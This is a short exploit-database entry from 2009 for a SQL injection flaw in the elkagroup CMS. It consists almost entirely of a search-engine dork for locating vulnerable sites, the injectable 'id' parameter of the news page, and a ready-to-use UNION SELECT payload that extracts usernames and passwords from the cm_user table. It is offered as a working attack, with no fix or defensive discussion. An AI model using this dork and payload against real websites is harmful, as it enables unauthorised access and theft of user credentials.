id: 10112
date: 12/06/2009
title: elkagroup SQL Injection Vulnerability
author: SadHaCkEr
cves: 

=====================================
elkagroup SQL Injection Vulnerability
=====================================


#Dork : "powered by: elkagroup"
[!] Exp:
[!]  http://server/news/?id=[SQL]                                                                                               
[!]
[!]    [SQL] :                                                                                                                              
[!]     UNION SELECT 1,2,3,4,5,6,7,8,9,10,group_concat(username,char(58),password),12,13,14,15,16,17,18,19,20,21,22,23 FROM+cm_user--                                                                        

              

#  0day.today [2023-03-23]  #